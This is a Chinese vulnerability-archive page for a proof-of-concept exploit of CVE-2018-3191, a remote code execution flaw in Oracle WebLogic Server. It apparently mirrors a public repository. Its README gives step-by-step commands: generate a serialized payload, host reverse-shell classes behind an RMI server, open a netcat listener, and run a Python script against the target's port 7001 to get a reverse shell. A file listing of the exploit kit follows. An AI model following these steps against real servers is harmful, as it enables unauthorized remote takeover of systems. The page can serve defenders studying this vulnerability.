支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: 43d4988f384d93df5e6557cfe6291a09d92e7034

来源
关联漏洞
标题:Oracle Fusion Middleware WebLogic Server组件安全漏洞 (CVE-2018-3191)
Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的WebLogic Server组件10.3.6.0版本、12.1.3.0版本和12.2.1.3版本的WLS Core Components子组件存在安全漏洞。攻击者可利用该漏洞控制组件,影响数据
介绍
# CVE-2018-3191-Rce-Exploit

## Author: Break

## Step 1: java -jar GenPayload.java output SJpayload.bin, Address is RMI Server address

## Step 2:java -jar RMISERVER.jar httpaddress, RMI server listening on port 1099 and load remote Reverse classes on web server

## Step 3:put two files(reverse shell)  LoadObject.class and StreamConnection.class on http server and can be visited by url

## Step 4: nc -llp 2222

## Step 5: python weblogic.py weblogicAddress 7001 SJpayload

## Step 6: wait for a reverse shell, good luck

文件快照

[4.0K] /data/pocs/43d4988f384d93df5e6557cfe6291a09d92e7034 ├── [2.3M] GenPayload.jar ├── [4.0K] out │   ├── [4.0K] artifacts │   │   └── [4.0K] WeblogicSpringJdni_jar │   │   └── [1.8M] WeblogicSpringJdni.jar │   └── [4.0K] production │   └── [4.0K] WeblogicSpringJdni │   ├── [1.5K] GenSpringJdniPayload.class │   ├── [1.3K] JNDIServer.class │   ├── [1.7K] LoadObject.class │   ├── [4.0K] META-INF │   │   └── [ 49] MANIFEST.MF │   └── [1.3K] StreamConnector.class ├── [ 526] README.md ├── [2.3M] RMISERVER.jar ├── [4.0K] src │   ├── [ 796] GenSpringJdniPayload.java │   ├── [ 778] JNDIServer.java │   ├── [1.2K] LoadObject.java │   ├── [4.0K] META-INF │   │   └── [ 49] MANIFEST.MF │   └── [1012] StreamConnector.java └── [5.1K] weblogic.py 8 directories, 15 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。